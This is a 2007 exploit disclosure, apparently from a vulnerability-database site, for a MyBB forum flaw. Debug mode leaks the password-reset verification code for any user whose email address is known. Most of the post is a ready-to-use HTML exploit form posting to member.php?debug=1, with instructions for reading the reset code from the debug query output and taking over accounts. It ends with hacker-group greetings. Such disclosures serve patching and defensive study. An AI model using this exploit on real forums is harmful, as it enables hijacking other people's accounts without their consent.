Mybb Change Password Vulnerability

2007-04-12 / 2007-04-13
Credit: HACKERS PAL
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hello,, Mybb Change Password Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] If You Can Use the debug mode you will be able to change the password for and user by knowing the registered email address Enter the email in the html code below after changing the website and mybb_dir to true variables then enter any user email address Look at the query number 12 or search for awaitingactivation you will find like INSERT INTO mybb123_awaitingactivation (uid, dateline, code, type) VALUES ('1', 'XXXX', 'ADbSXnoM', 'p') --- >> ('1', 'XXXX', 'ADbSXnoM', 'p') 1 is the userid , XXXX is the time , ADbSXnoM' is the change password verification code , 'p' is the type which is password change <<<HTM EXPLOIT <form action="http://website/mybb_dir/member.php?debug=1" method="post"> <table border="0" cellspacing="1" cellpadding="4" class="tborder"> <tr> <td class="trow1" width="40%"><strong>Email Address:</strong></td> <td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td> </tr> <tr><td wlign=center> <input type="hidden" name="action" value="do_lostpw" /> <input type="submit" class="button" value="Enter Here" /> </td></tr> </table> </form> >>> GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD; Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS; End of it :) WwW.SoQoR.NeT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top